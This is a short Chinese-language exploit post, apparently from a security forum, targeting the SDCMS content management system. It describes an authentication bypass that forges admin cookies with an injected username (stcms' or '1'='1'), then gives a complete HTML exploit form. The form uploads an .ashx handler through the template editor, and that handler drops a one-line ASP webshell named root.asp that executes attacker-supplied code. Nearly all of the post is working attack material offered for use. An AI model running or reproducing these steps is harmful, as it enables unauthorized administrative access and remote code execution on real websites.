|
首先在以下地址使用 livehttpheader 抓包得到 COOKIE 值:
http://192.168.248.129/admin/index.asp?Action=out
COOKIE:
1Rq4Qz6We6Dbsdcms%5Finfolever=; 1Rq4Qz6We6Dbsdcms%5Falllever=; 1Rq4Qz6We6Dbsdcms%5Fadmin=;
1Rq4Qz6We6Dbsdcms%5Fpwd=; 1Rq4Qz6We6Dbsdcms%5Fname=; 1Rq4Qz6We6Dbsdcms%5Fid=;
ASPSESSIONIDCQDBQTAD=BHPFKHJBDBOIPLOMALGOMFAA
查询语句:
Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='"&sdcms_adminname&"' And
sdcms_pwd='"&sdcms_adminpwd&"'"
Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='stcms' or '1'='1' or
'1'='1' And sdcms_pwd='LAONA'"
用户名可以前台得到:
stcms%27%20or%20%271%27%3D%271%27%20or%20%271%27%3D%271
使用 COOKIE EDIT 修改 COOKIE:
1Rq4Qz6We6Dbsdcms%5Fpwd=123; 1Rq4Qz6We6Dbsdcms%5Fname=stcms' or '1'='1' or
'1'='1;1Rq4Qz6We6Dbsdcms%5Fadmin=1;1Rq4Qz6We6Dbsdcms%5Fid=1;
然后进入:
http://192.168.248.129/admin/sdcms_template.asp?action=add&Path=2009
或者直接使用底下的 fuck.html。
其实就是一个COOKIE,或者进后台吧,虚拟机2003测试的。。。不行当我没发。。。
fuck.html 源码【Exp】:
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1">
<form name="add" id="add" method="post"
action="http://192.168.248.129/admin/sdcms_template.asp?action=save&t3=True&Path=2009"
onSubmit="return checkadd()">
<tr>
<td width="120" align="center" class="tdbg">目 录: </td>
<td class="tdbg">../Skins/2009/</td>
</tr>
<tr>
<td align="center" class="tdbg">文件名: </td>
<td class="tdbg"><input name="t0" type="text" class="input" value="0x255.ashx" id="t0"
size="40"> <span>格式:sdcms_index.htm</span></td>
</tr>
<tr class="tdbg">
<td align="center">内容:</td>
<td><textarea id="t1" name="t1" class="inputs" rows="20">GIF8A
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"0x255.com\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
</textarea></td>
</tr>
<tr class="tdbg">
<td> </td>
<td><input type="submit" class="bnt" value="保存设置"> <input type="button"
onClick="history.go(-1)" class="bnt" value="放弃返回"></td>
</tr>
</form>
</table>
|
推荐
评论(0条)
